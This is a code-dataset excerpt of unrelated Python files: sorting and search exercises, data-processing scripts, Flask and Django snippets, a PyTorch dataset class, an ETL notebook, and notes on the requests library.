list[middle]:\n return middle\n\n return -1\n\ndef SelectionSort(a, n):\n for i in range(n):\n for j in range(i, n):\n if a[i] > a[j]:\n temp = a[i]\n a[i] = a[j]\n a[j] = temp\n return a\n\nn = int(input('배열 크기 : '))\nlist = list()\nfor i in range(n):\n list.append(int(input()))\nkey = int(input('찾고자 하는 키 : '))\n\nlist = SelectionSort(list, n) # 정렬\n\nprint(BinarySearch(list, key))","sub_path":"dataStructure/No1/BinarySearch.py","file_name":"BinarySearch.py","file_ext":"py","file_size_in_byte":845,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"647559278","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nProblem 7-a : Python code for solving initial value problems using scipy.integrate,solve_ivp . Also find\nthe nalytical solution of the probelm using Mathematica and plot it.\nCreated on Wed Apr 1 19:00:20 2020\n\n@author: krishnendu\n\"\"\"\n\nimport numpy as np\nfrom scipy.integrate import *\nimport matplotlib.pyplot as plt\ndef fun1(t,y): ##defining the function for derivative \n return t*np.exp(3*t)-2*y\nt=np.linspace(0,1,1000) #creating mesh points\ns=solve_ivp(fun1,[0,1],[0],dense_output=\"True\") #solving the probelm using solve_ivp \nplt.plot(t,s.sol(t).T,label='using soe_ivp') #plotting the solution using solve_ivp\nplt.plot(t,(1/25)*(np.exp(-2*t)-np.exp(3*t))+(1/5)*np.exp(3*t)*t,label='analytical') #plotting the analytical solution\nplt.legend()\nplt.xlabel(\"t\",size=18)\nplt.ylabel(\"y\",size=18)\nplt.title(\"Problem 7-a\",size=18)\nplt.grid()\nplt.show()\n\n\n","sub_path":"problem_7-a_assign_2.py","file_name":"problem_7-a_assign_2.py","file_ext":"py","file_size_in_byte":946,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"95106154","text":"#sqlite3 interface code using python\nimport sqlite3\nconnection = sqlite3.connect(\"sample.db\")\ncursor = connection.cursor()\nprompt = \"sqlite3>\"\n\nwhile True:\n\tprint(prompt, end = \" \")\n\tquery = input(\"\")\n\tif query.lower() == '.quit':\n\t\texit()\n\telif query.lower() == '.tables':\n\t\ttableList = cursor.execute(\"SELECT name FROM sqlite_master WHERE type = 'table'\")\n\t\tfor tables in tableList:\n\t\t\tprint(tables[0], end = \" \")\n\n\t\tquery = \" \" \n\t\t'''Even though it is enclosed in try block, it is printing the error.'''\n\n\telse:\n\t\twhile query[-1] != \";\":\n\t\t\tquery = query + input(\" -->\")\n\n\ttry:\n\t\tcursor.execute(query) #executes query \n\n\t\tconnection.commit() #commits with database.\n\t\t#to print the result\n\t\toutput = cursor.fetchall()\n\t\tfor data in output:\n\t\t\tprint(\"\")\n\t\t\tfor item in data:\n\t\t\t\tprint(item, end = \"|\")\n\t\tprint(\" \")\n\texcept Exception as e:\n\t\tprint(e)\n\t\tpass\n","sub_path":"sqlite3Interface.py","file_name":"sqlite3Interface.py","file_ext":"py","file_size_in_byte":863,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"137497721","text":"import pandas as pd\r\nimport numpy as np\r\n\r\n#Open File with Voting\r\ndf = pd.read_csv('votes.csv')\r\ndf = df.drop([\"id\", \"uploaded_on\", \"status\"], axis = 1)\r\n\r\n#Open File with Pic Data\r\ndf_img = pd.read_csv('images.csv')\r\ndf_img.username = df_img.username.str.replace(\"https://www.zroadster.com/forum/members/\", '').str.split('.').str[0]\r\ndf_img = df_img.drop([\"size\", \"votes\", \"uploaded_on\", \"status\", \"id\", \"random_ID\"], axis = 1)\r\n\r\n#New DF for Output\r\ndf_final = pd.DataFrame(columns=[\"file_name\", \"random_ID_voter\"])\r\n\r\n#Unserialize PHP and append it to DF\r\nfor index, row in df.iterrows():\r\n vote_list = row[\"votes\"].split('\"')[1:][::2]\r\n user_id = row[\"random_ID\"]\r\n for e in vote_list:\r\n df_new = pd.DataFrame([[e, user_id]], columns=[\"file_name\", \"random_ID_voter\"])\r\n df_final = df_final.append(df_new)\r\n\r\n#Merge Pic Information to Votes\r\ndf_final = df_final.merge(df_img, on = \"file_name\", how=\"left\")\r\ndf_final = df_final.reset_index(drop=True)\r\n\r\n#Get Image Name and Num Votes\r\nranking = pd.DataFrame()\r\nranking[\"file_name\"] = df_final.file_name.value_counts().index\r\nranking[\"votes\"] = df_final.file_name.value_counts().values\r\n\r\n#Merge Username to Image\r\nranking = ranking.merge(df_img, on = \"file_name\", how=\"left\")\r\n\r\n#Just One Picture per Username\r\nuser_list = ranking.username.unique().tolist()\r\nbest_user = pd.DataFrame(columns=[\"file_name\", \"votes\", \"username\"])\r\n\r\nfor u in user_list:\r\n user_stats = ranking[ranking.username == u]\r\n user_stats = user_stats.reset_index(drop = True)\r\n \r\n if (len(user_stats) > 2):\r\n if user_stats.votes[0] != user_stats.votes[1]:\r\n best_user = best_user.append(ranking[ranking.username == u][:1])\r\n elif user_stats.votes[1] != user_stats.votes[2]:\r\n best_user = best_user.append(ranking[ranking.username == u][:2])\r\n else:\r\n best_user = best_user.append(ranking[ranking.username == u][:])\r\n \r\n elif len(user_stats) > 1:\r\n if user_stats.votes[0] != user_stats.votes[1]:\r\n best_user = best_user.append(ranking[ranking.username == u][:1])\r\n else:\r\n best_user = best_user.append(ranking[ranking.username == u][:])\r\n \r\n else:\r\n best_user = best_user.append(ranking[ranking.username == u][:])\r\n \r\n \r\nbest_user = best_user.reset_index(drop = True)\r\n\r\n#Statistics\r\nprint('Anzahl eingereichter Bilder:', len(df_img))\r\nprint('Anzahl gevoteter Bilder:', len(df_final.file_name.unique()))\r\nprint('Anzahl User gevotet:', len(df_final.random_ID_voter.unique()))\r\nprint('Anzahl Stimmen:', len(df_final.file_name))\r\nprint('Stimmen/User:', round(len(df_final.file_name) / len(df_final.random_ID_voter.unique()),2))\r\nprint(120*\"-\")\r\n\r\n#Best 12 Pictures\r\nprint('Die 12 Fotos mit den meisten Stimmen:')\r\nprint(ranking[:12])\r\nprint(120*\"-\")\r\n\r\n#Best 12 Pictures (If User Twice in List Show More Pictures)\r\ncounter = 12\r\nbul = best_user.username[:counter].tolist()\r\nfor e in list(set(bul)):\r\n if bul.count(e) > 1:\r\n counter += 1\r\n \r\nprint('Die', counter ,'Fotos mit den meisten Stimmen (1 Bild/User):')\r\nprint(best_user[:counter])\r\nprint(120*\"-\")\r\n\r\n\r\n#List of All Votes\r\nwith pd.option_context('display.max_rows', None, 'display.max_columns', None):\r\n print(df_final.drop('username', axis=1))","sub_path":"auswertung.py","file_name":"auswertung.py","file_ext":"py","file_size_in_byte":3325,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"479840099","text":"\"\"\"View definitions for the home app.\"\"\"\n\nfrom django.shortcuts import redirect\n\n\ndef reference_redirect(request):\n \"\"\"Functional view that accepts any request starting with a reference namespace.\"\"\"\n base_url = \"http://reference.iatistandard.org\"\n slug = request.get_full_path()\n redirection_url = base_url + slug\n return redirect(to=redirection_url, permanent=True)\n","sub_path":"iati/home/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":383,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"484612612","text":"# Vingle Team Lunch v0.4.1\n\nimport random\n\n#people data\npeople = [[\"TAEMOON\", \"ENG\"],[\"DONGSOO\", \"ENG\"],[\"JUYEOUNG\", \"ENG\"],[\"WONSIK\", \"ENG\"],[\"KURT\", \"ENG\"],[\"JIHYE\", \"ENG\"],[\"CHARLIE\", \"ENG\"],[\"RACHEL\", \"PRO\"],[\"JUSTIN\", \"PRO\"],[\"SUYEONG\", \"PRO\"],[\"TAEO\", \"PRO\"],[\"JOSHUA\", \"PRO\"],[\"JONATHAN\", \"MAR\"],[\"SURYEON\", \"MAR\"],[\"SEYOUNG\", \"MAR\"],[\"SOYUN\", \"MAR\"],[\"HYOJIN\", \"MAR\"],[\"HENRY\", \"MAR\"],[\"SANGHOON\", \"MAR\"],[\"JEONGWON\", \"MAR\"],[\"ELIZABETH\", \"MAR\"],[\"CAROL\", \"MAR\"], [\"JOE\", \"PRO\"]]\n\n\nvolume = 4\ninput_string = \"Who will not eat lunch? (input a number) : \"\n\n#print people\ncount = 0\nfor person in people:\n print(str(count) + \" : \" + str(person[0]))\n count += 1\n\n\nexceptionlist = []\nnumber = raw_input(input_string)\n\nwhile number != '':\n\tif int(number) < len(people):\n\t\tperson = people[int(number)]\n\t\tname = person[0]\n\t\tprint (name)\n\t\texceptionlist.append(name)\n\tnumber = raw_input(input_string)\n\nprint(\"\\n\\nThis members are excepted : %s\" % str(exceptionlist))\n\nlunchMember = []\n\n\nfor person in people:\n if (person[0] in exceptionlist) == False:\n lunchMember.append(person)\n\n\nteamcount = int(len(lunchMember)/volume)\n\n\nteams = []\n\nfor index in range(teamcount): # [0,1,2,3]\n teams.append([])\n\nprint(\"\\nteam count : %s\\nlunch member count : %s\\n\" % (str(teamcount), len(lunchMember)))\n\nrandom.shuffle(lunchMember)\n\neng = []\npro = []\nmar = []\n\nfor person in lunchMember:\n if person[1] == \"ENG\":\n eng.append(person)\n elif person[1] == \"PRO\":\n pro.append(person)\n else:\n mar.append(person)\n\ncount = 0\nfor person in eng:\n team = teams[count%teamcount]\n team.append(person[0])\n count += 1\n \nfor person in pro:\n team = teams[count%teamcount]\n team.append(person[0]) \n count += 1 \n\nfor person in mar:\n team = teams[count%teamcount]\n team.append(person[0])\n count += 1\n\n\nfor team in teams:\n\tprint(team)\nprint(\"\\n\\n\")\n","sub_path":"vinglelunch.py","file_name":"vinglelunch.py","file_ext":"py","file_size_in_byte":1896,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"139174466","text":"import abc\n\nfrom torch.utils import data\nfrom .runtime_transformations import GenericSequenceRuntimeDatasetTransformer\n\n\nclass InstanceDatasetBase(data.Dataset):\n __metaclass__ = abc.ABC\n\n @property\n @abc.abstractmethod\n def semantic_class_names(self):\n pass\n\n # __getitem__(self, index) enforced by data.Dataset\n # __len__(self) enforced by data.Dataset\n\n\nclass TransformedInstanceDataset(InstanceDatasetBase):\n __metaclass__ = data.Dataset\n\n def __init__(self, raw_dataset, raw_dataset_returns_images=False, precomputed_file_transformation=None,\n runtime_transformation=None):\n \"\"\"\n :param raw_dataset_returns_images: Set to false for standard datasets that load from files; set to true for\n synthetic datasets that directly return images and labels.\n \"\"\"\n\n if raw_dataset_returns_images:\n assert precomputed_file_transformation is None, 'Cannot do precomputed file transformation on datasets ' \\\n 'of type \\'images\\' (generated on the fly).'\n self.raw_dataset_returns_images = raw_dataset_returns_images\n self.raw_dataset = raw_dataset\n self.precomputed_file_transformation = precomputed_file_transformation\n self.runtime_transformation = runtime_transformation\n self.should_use_precompute_transform = True\n self.should_use_runtime_transform = True\n\n def __len__(self): # explicit\n return len(self.raw_dataset)\n\n def __getitem__(self, index):\n precomputed_file_transformation = self.precomputed_file_transformation if \\\n self.should_use_precompute_transform else None\n runtime_transformation = self.runtime_transformation if \\\n self.should_use_runtime_transform else None\n img, lbl = self.get_item(index,\n precomputed_file_transformation=precomputed_file_transformation,\n runtime_transformation=runtime_transformation)\n return img, lbl\n\n @property\n def semantic_class_names(self):\n return self.get_semantic_class_names()\n\n @property\n def n_semantic_classes(self):\n return len(self.semantic_class_names)\n\n def get_semantic_class_names(self):\n \"\"\"\n If we changed the semantic subset, we have to account for that change in the semantic class name list.\n \"\"\"\n if self.should_use_runtime_transform and self.runtime_transformation is not None:\n transformation_list = self.runtime_transformation.transformer_sequence if isinstance(\n self.runtime_transformation, GenericSequenceRuntimeDatasetTransformer) else \\\n [self.runtime_transformation]\n semantic_class_names = self.raw_dataset.semantic_class_names\n for transformer in transformation_list:\n if hasattr(transformer, 'transform_semantic_class_names'):\n semantic_class_names = transformer.transform_semantic_class_names(\n semantic_class_names)\n return semantic_class_names\n else:\n return self.raw_dataset.semantic_class_names\n\n def load_files(self, img_file, sem_lbl_file, inst_lbl_file):\n # often self.raw_dataset.load_files(?)\n raise NotImplementedError\n\n def get_item_from_files(self, index, precomputed_file_transformation=None):\n data_file = self.raw_dataset.files[index] # files populated when raw_dataset was instantiated\n img_file, sem_lbl_file, inst_lbl_file = data_file['img'], data_file['sem_lbl'], data_file['inst_lbl']\n\n # Get the right file\n if precomputed_file_transformation is not None:\n img_file, sem_lbl_file, inst_lbl_file = \\\n precomputed_file_transformation.transform(img_file=img_file, sem_lbl_file=sem_lbl_file,\n inst_lbl_file=inst_lbl_file)\n\n # Run data through transformation\n img, lbl = self.load_files(img_file, sem_lbl_file, inst_lbl_file)\n return img, lbl\n\n def get_item(self, index, precomputed_file_transformation=None, runtime_transformation=None):\n if not self.raw_dataset_returns_images:\n img, lbl = self.get_item_from_files(index, precomputed_file_transformation)\n else:\n img, lbl = self.raw_dataset.__getitem__(index)\n assert precomputed_file_transformation is None, 'Cannot do precomputed file transformation on datasets ' \\\n 'of type \\'images\\' (generated on the fly).'\n if runtime_transformation is not None:\n img, lbl = runtime_transformation.transform(img, lbl)\n\n return img, lbl\n","sub_path":"instanceseg/datasets/instance_dataset.py","file_name":"instance_dataset.py","file_ext":"py","file_size_in_byte":4789,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"549824954","text":"# Databricks notebook source\n# MAGIC %md\n# MAGIC ### Fact Supply Plan Planning\n# MAGIC \n# MAGIC Takes LGTY_PRDTN_PLN_RPT and creates a CSC table from it. This only runs after the 4pm daily run of LGTY_PRDTN_PLN_RPT.\n# MAGIC \n# MAGIC | Date | Author | Work Item | Notes |\n# MAGIC |-----------------------------------|\n# MAGIC | 2020-10-01 | Sukanya De | OMNI-143889 | Initial notebook based on mapping |\n# MAGIC | 2020-10-27 | Matt Kleiman | OMNI-143889 | Formatting changes |\n# MAGIC | 2020-10-27 | Matt Kleiman | OMNI-161335 | Mapping changes -- now hits snapshot table |\n# MAGIC | 2020-02-18 | Matt Kleiman | OMNI-160993 | Mapping changes -- now hits lgty_prdtn_ppd_snpst table to fix issues with Material Number |\n\n# COMMAND ----------\n\n# DBTITLE 1,Initialization\nfrom pyspark.sql.functions import col, lit, current_timestamp, expr, when\nfrom pyspark.sql.types import IntegerType\nfrom datetime import date, datetime\n\n# Parameters\ndbutils.widgets.text('initFlg', '', '')\ndbutils.widgets.text(\"schmNm\", \"\", \"\")\ndbutils.widgets.text(\"tblNm\", \"\", \"\")\n\n# Base variables\nschema_name = dbutils.widgets.get(\"schmNm\").lower()\ntable_name = dbutils.widgets.get(\"tblNm\").lower()\nschema_table_name = f'{schema_name}.{table_name}'\n\ntable_exists = table_name in sqlContext.tableNames(schema_name)\noverwrite = dbutils.widgets.get('initFlg') == 'X'\n\n# COMMAND ----------\n\n# MAGIC %run\n# MAGIC /Users/svceimdbrx@columbia.com/edw_admin/shared_functions\n\n# COMMAND ----------\n\n# DBTITLE 1,Prepare Dataset\nsource_table = 'ENTPR_PLANNING.LGTY_PRDTN_PPD_SNPST'\n\n# Configuration\npk_list = [\n 'SnapshotDate',\n 'Iteration',\n 'MaterialNumber',\n 'RegionCode',\n 'ReplenishmentFlag',\n 'Channel',\n 'SubChannel',\n 'SeasonCode'\n]\n\nmetrics_list = [\n 'SupplyPlanQuantity'\n]\n\nsurrogate_key_list = [\n 'DimRegionKey',\n 'DimChannelPlanningKey',\n 'DimSubChannelPlanningKey',\n 'DimSeasonKey',\n 'DimProductPlanningKey',\n 'DimProductChannelPlanningKey',\n 'DimProductSubChannelPlanningKey',\n 'DimProductSubChannelSeasonPlanningKey',\n 'DimFulfillmentSubChannelPlanningKey',\n 'DimStandardCostKey',\n 'DimCurrencySeasonalKey' \n]\n\nfact_columns = pk_list + metrics_list + surrogate_key_list\n\n# Create dataframe\nfact_df = (spark.table(source_table)\n .filter(\"SPLY_TYP_CD in ('FIRM', 'PLND')\")\n\t\t .filter(f\"SNPST_DT = (select max(snpst_dt) from {source_table} where ITER != 1)\")\n\t\t .withColumn('SnapshotDate', col('SNPST_DT'))\n\t\t .withColumn('Iteration', col('ITER'))\n .withColumn('MaterialNumber', col('MTRL_NBR'))\n .withColumn('RegionCode', when(col('RGN_CD') == 'USAR', lit('USA')).otherwise(col('RGN_CD')))\n .withColumn('ReplenishmentFlag', when(col('RGN_CD') == 'USAR', lit('Y')).otherwise(lit('N')))\n .withColumn('Channel', lit('Undesignated'))\n .withColumn('SubChannel', lit('Undesignated')) \n .withColumn('SeasonCode', col('SEAS_CD'))\n .withColumnRenamed('SPLY_PLN_UNITS', 'SupplyPlanQuantity')\n .groupBy(*pk_list)\n .agg({col: 'sum' for col in metrics_list})\n .withColumn('SupplyPlanQuantity', col('sum(SupplyPlanQuantity)').cast('decimal(19,8)'))\n .add_surrogate_keys(surrogate_key_list)\n .select(*fact_columns)\n .add_edw_fields()\n )\n\n# COMMAND ----------\n\n# DBTITLE 1,Update Databricks Table\narg_dict = {'name': schema_table_name, 'format': 'delta', 'mode': 'overwrite'}\n\nif overwrite or not table_exists:\n arg_dict['mergeSchema'] = 'true'\n spark.sql(f'drop table if exists {schema_table_name}')\n dbutils.fs.rm(f'/mnt/entadls/published/eim/managed/{schema_name}/{table_name}', True)\n print('Overwriting...')\nelse:\n fact_df = update_table(fact_df, schema_table_name, pk_list, set_inactives=True)\n print('Updating')\n\nprint(f'New records: {fact_df.count()}')\nfact_df.write.saveAsTable(**arg_dict)\n\n# COMMAND ----------\n\n# DBTITLE 1,Write to ADW\nfact_df.filter(f\"EDW_UPDT_TS >= '{date.today()}'\").createOrReplaceGlobalTempView(table_name)\n\ndbutils.notebook.run('/Users/svceimdbrx@columbia.com/edw_admin/adw_integration_write', 120000, {'schemaNm': f'{schema_name.upper()}_LND', 'tableNm': table_name, 'dbrxTable': table_name, 'writeMode': 'overwrite'})\n\nspark.sql(f'drop view global_temp.{table_name}')\n","sub_path":"Prod/csc/fact_supply_plan_planning.py","file_name":"fact_supply_plan_planning.py","file_ext":"py","file_size_in_byte":4241,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"551318750","text":"from flask import Flask\nfrom flask_production import TaskScheduler\nfrom flask_production.plugins import TaskMonitor\n\nimport time\nimport json\nimport pytest\n\nMONITOR_NAME = \"Web Test\"\n\napp = Flask(__name__)\nsched = TaskScheduler()\nmonitor = TaskMonitor(app, sched=sched, display_name=MONITOR_NAME)\n\ntoggle = False\n\n@app.route(\"/\", methods=['GET'])\ndef main():\n\treturn 'Main dummy page'\n\n\ndef wash_car():\n\t\"\"\"\n\tThis is a dummy job that is scheduled to wash my car\n\tNote: objects in the mirror are closer than they appear\n\t\"\"\"\n\tglobal toggle\n\ttoggle = not toggle\n\tif toggle:\n\t\tcount = 50\n\t\twhile count > 0:\n\t\t\ttime.sleep(0.1)\n\t\t\tprint(\"washing..\\n\")\n\t\t\tcount -= 1\n\t\tprint(\"The car was washed\")\n\telse:\n\t\ttime.sleep(1)\n\t\traise Exception(\"car wash failed!\")\n\ndef another_task():\n\tprint(\"another_task\")\n\n\n@pytest.fixture\ndef client():\n\twith app.test_client() as c:\n\t\tyield c\n\n\ndef test_webservice(client):\n\tassert(client.get(\"/\").status_code==200)\n\ndef test_blankpage(client):\n\thomepage = client.get(\"/{}\".format(monitor._endpoint))\n\tassert(homepage.status_code==200)\n\tassert(homepage.data.decode().lower()=='nothing here')\n\n\ndef test_monitor_homepage(client):\n\tsched.every(\"day\").at(\"8:00\").do(another_task)\n\tsched.every(20).do(wash_car, do_parallel=True)\n\tsched.every(30).do(lambda: wash_car(), do_parallel=True)\n\t# CherryFlask(app, sched).run() # unused\n\n\thomepage = client.get(\"/{}\".format(monitor._endpoint))\n\tassert(homepage.status_code==200)\n\thtml_text = homepage.data.decode(errors='ignore').lower()\n\tassert(\"lambda\" in html_text)\n\tassert(\"wash_car\" in html_text)\n\tassert(\"another_task\" in html_text)\n\n\ndef test_monitor_jobpage(client):\n\tjobpage = client.get(\"/{}/0\".format(monitor._endpoint))\n\tassert(jobpage.status_code==200)\n\thtml_text = jobpage.data.decode(errors='ignore').lower()\n\tassert(\"another_task\" in html_text)\n\tassert(\"lambda\" not in html_text)\n\tassert(\"logs\" in html_text)\n\tassert(\"next run in\" in html_text)\n\n\ndef test_monitor_rerun_btn(client):\n\tsched.every(30).do(another_task, do_parallel=True)\n\tres = client.post(\"/{}/rerun\".format(monitor._endpoint), json={'jobid':0})\n\tassert(res.status_code==200)\n\tassert(\"success\" in res.data.decode(errors='ignore').lower())\n\n\ndef test_monitor_all_json(client):\n\tsched.every(\"day\").at(\"8:00\").do(another_task)\n\n\tresp = client.get(\"/{}/json/all\".format(monitor._endpoint), content_type='application/json')\n\trespdict = json.loads(resp.data.decode('utf8'))\n\tassert('success' in respdict)\n\tassert(isinstance(respdict['success'], list))\n\tassert(isinstance(respdict['success'][0], dict))\n\tassert(isinstance(respdict['success'][0]['logs'], dict))\n\n\ndef test_monitor_one_json(client):\n\tsched.every(\"day\").at(\"8:00\").do(another_task)\n\n\tresp = client.get(\"/{}/json/0\".format(monitor._endpoint), content_type='application/json')\n\trespdict = json.loads(resp.data.decode('utf8'))\n\tassert('success' in respdict)\n\tassert(isinstance(respdict['success'], dict))\n\tassert(respdict['success']['jobid']==0)\n\n\ndef test_monitor_summary(client):\n\tsched.every(\"day\").at(\"8:00\").do(another_task)\n\n\tall_resp = client.get(\"/{}/json/all\".format(monitor._endpoint), content_type='application/json')\n\tall_respdict = json.loads(all_resp.data.decode('utf8'))\n\n\tresp = client.get(\"/{}/json/summary\".format(monitor._endpoint), content_type='application/json')\n\trespdict = json.loads(resp.data.decode('utf8'))\n\tassert('success' in respdict)\n\tassert(respdict['success']['name']==MONITOR_NAME)\n\tassert(respdict['success']['summary']['count']==len(respdict['success']['details']))\n\tassert(respdict['success']['summary']['errors']==0)\n\n\tassert(len(all_respdict['success'])==len(respdict['success']['details']))\n","sub_path":"tests/test_plugins.py","file_name":"test_plugins.py","file_ext":"py","file_size_in_byte":3628,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"311192058","text":"\"\"\"Utility funtions for reading from and writing to JSON, CSV, and other file types.\"\"\"\n\nimport csv\nimport json\nimport os\nfrom typing import Any\nfrom typing import List\nfrom typing import Union\n\n\ndef open_csv(csv_file: str, dict_reader: bool = False, delimiter: str = ',') -> List:\n \"\"\"Delimiter can also be a pipe (|)\"\"\"\n with open(csv_file, 'r') as file:\n if dict_reader:\n reader = csv.DictReader(file, delimiter=delimiter)\n else:\n reader = csv.reader(file, delimiter=delimiter)\n return list(reader)\n\n\ndef write_csv(csv_file: str, rows: List[Any], has_header: bool = True) -> None:\n with open(csv_file, 'w') as file:\n csv_writer = csv.writer(file)\n if has_header:\n csv_writer.writerow(rows[0])\n rows.pop(0)\n csv_writer.writerows(rows)\n\n\ndef open_text(text_file: str):\n with open(text_file, 'r') as file:\n return file.readlines()\n\n\ndef get_file_size(path: str) -> Union[int, None]:\n try:\n return os.path.getsize(path)\n except os.error as e:\n print(\"util.file_handler got the following error: {}\".format(e))\n return None\n\n\ndef open_json(json_file: str) -> dict:\n with open(json_file) as file:\n return json.load(file)\n\n\ndef write_json(json_file: str, json_dict: dict) -> None:\n with open(json_file, 'w') as file:\n json.dump(json_dict, file)\n","sub_path":"utils/file_helper.py","file_name":"file_helper.py","file_ext":"py","file_size_in_byte":1392,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"193375999","text":"# put your code here.\n\nimport string\nimport sys\nimport collections\n\ndef find_word_count(input_file):\n \"\"\"Inputs file and counts number of times each word appears\n\n Removes punctuation and capitalization\n\n \"\"\"\n # file = open(input_file)\n # words_dict = {}\n\n # for line in file:\n # line_words = line.split()\n # # line_words = line.split(\" \")\n # for word in line_words:\n # word = word.lower()\n # for c in word:\n # if c in string.punctuation:\n # word= word.strip(c)\n # words_dict[word] = words_dict.get(word, 0) + 1\n\n # for word, count in words_dict.items():\n # print(\"{} {}\".format(word, count))\n\n file_string = open(input_file).read()\n text = file_string.lower()\n\n # This is not working!!!!\n for c in text:\n if c in string.punctuation:\n text=text.replace(c,\"\")\n\n words = text.split()\n\n for word, count in collections.Counter(words).items():\n print(\"{} {}\".format(word, count))\n\n\nfind_word_count(sys.argv[1])\n\n","sub_path":"wordcount.py","file_name":"wordcount.py","file_ext":"py","file_size_in_byte":1066,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"638818977","text":"'''\r\n@Author: MaoZi_Sakura\r\n@Contact: zhang132412sakura@outlook.com\r\n'''\r\n\r\n\r\n'''\r\nrequests.get(url, params)\r\nurl: 拟获取页面的url链接\r\nparams: url中的额外参数, 字典或字节流格式, 可选\r\n构造一个向服务器请求资源的Request对象, 返回一个包含服务器资源的 Response 对象\r\n\r\nResponse 对象:\r\nResponse.status_code: 状态码, 200表示成功, 404等表示失败\r\nResponse.text: HTTP响应内容的字符串形式, 即 url 对应的页面内容\r\nResponse.encoding: 从 HTTP header 中猜测的响应内容编码方式, 根据 header 获得编码,若为获取到, 默认编码为 ISO-8859-1\r\nResponse.apparent_encoding: 从内容中分析出的响应内容编码方式(备选编码方式), 根据网页内容分析出的编码方式\r\nResponse.content: HTTP响应内容的二进制形式\r\n\r\nrequests 异常:\r\nrequests.ConnectionError: 网络连接错误异常, 如 DNS 查询失败, 拒绝连接等\r\nrequests.HTTPError: HTTP错误异常\r\nrequests.URLRequired: URL缺失异常\r\nrequests.TooManyRedirects: 超过最大重定向次数, 产生重定向异常\r\nrequests.ConnectTimeout: 连接远程服务器超时异常\r\nrequests.Timeout: 请求URL超时, 产生超时异常\r\n\r\nResponse.raise_for_status(): 判断返回值是否为200, 不为200时, 产生 Requests.HTTPError 异常\r\n\r\nRequests库主要方法\r\nrequests.request(): 构造一个请求, 支持以下各个方法的基础方法\r\nrequests.get(): 获取 HTML 网页的主要方法, 对应于 HTTP 的 GET\r\nHTTP GET: 请求获取 URL 位置的资源\r\nrequests.head(): 获取 HTML 网页头信息的方法, 对应于 HTTP 的 HEAD\r\nHTTP HEAD: 请求获取 URL 位置资源的响应信息报告, 即获得该资源的头部信息\r\nrequests.post(): 向 HTML 网页提交 POST 请求的方法, 对应于 HTTP 的 POST\r\nHTTP POST: 请求向 URL 位置的资源后附加新的数据\r\nrequests.put(): 向 HTML 网页提交 PUT 请求的方法, 对应于 HTTP 的 PUT\r\nHTTP PUT: 请求向 URL 位置存储一个资源, 覆盖原 URL 位置的资源\r\nrequests.patch(): 向 HTML 网页提交局部修改请求, 对应于 HTTP 的 PATCH\r\nHTTP PATCH: 请求局部更新 URL 位置的资源, 即改变该处资源的部分内容\r\nrequests.delete(): 向 HTML 页面提交删除请求, 对应于 HTTP 的 DELETE\r\nHTTP DELETE: 请求删除 URL 位置存储的资源\r\n\r\nrequests.request(method, url, **kwargs)\r\n**kwargs: 控制访问的参数, 均为可选项\r\nparams: 字典或字节序列, 作为参数增加到 url 中\r\ndata: 字典、字节序或文件对象, 作为 Request 的内容\r\njson: josn格式的数据, 作为 Request 的内容\r\nheaders: 字典, HTTP定制头\r\ncookies: 字典或 CookieJar, Request 中的 cookie\r\nauth: 元组, 支持 HTTP 认证功能\r\nfiles: 字典类型, 传输文件\r\ntimeout: 设定超时时间, 秒为单位\r\nproxies: 字典类型, 设定访问代理服务器, 可以增加登录认证\r\nallow_redirects: False/True, 默认为 True, 重定向开关\r\nstream: True/False, 默认为 True, 获取内容立即下载开关\r\nverify: True/False, 默认为 True, 认证 SSL ��书开关\r\ncert: 本地 SSL 证书路径\r\n'''\r\n\r\n\r\nimport os\r\nimport requests\r\n\r\n\r\ndef get_url(url):\r\n try:\r\n headers_kv = {'user-agent': 'Mozilla/5.0'}\r\n params_kv = {'ip': '202.204.80.112'}\r\n r = requests.get(url, headers = headers_kv, params = params_kv)\r\n r.status_code\r\n r.encoding = r.apparent_encoding\r\n except:\r\n return \"Error\"\r\n else:\r\n return r\r\n\r\n\r\ndef main():\r\n # print(os.path.abspath('../'))\r\n url = r'http://www.ip138.com/ips138.asp'\r\n r = get_url(url)\r\n print(r.request.url)\r\n\r\n print(r.text)\r\n\r\n\r\nif __name__ == '__main__':\r\n main()\r\n\r\n\r\n","sub_path":"Basis_Learn/Requests_Learn.py","file_name":"Requests_Learn.py","file_ext":"py","file_size_in_byte":3719,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"438794869","text":"from django.conf.urls import url\nfrom .views import user_family_reg, edit_family, delete_family\n\napp_name = 'housename'\n\nurlpatterns = [\n url(r'^$', user_family_reg, name='HouseNameForms'),\n url(r'^edit-family/(?P\\d+)$', edit_family, name='edit_family'),\n url(r'^delete-family/(?P\\d+)$', delete_family, name='delete_family'),\n]","sub_path":"Gconnect/housename/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":344,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"130584290","text":"import numpy as np\nimport matplotlib.pyplot as plt\nimport pandas as pd\nimport seaborn as sns\n\nimport matplotlib as mpl\nfrom matplotlib import rcParams\n\nimport pickle\n\nfont = {'size' : 12, }\naxes = {'labelsize': 'medium', 'titlesize': 'medium'}\n\nsns.set_context(\"talk\")\nsns.set_style(\"white\")\n\nmpl.rc('font', **font)\nmpl.rc('axes', **axes)\n## for Palatino and other serif fonts use:\n#rc('font',**{'family':'serif','serif':['Palatino']})\n# plt.rcParams['text.usetex'] = 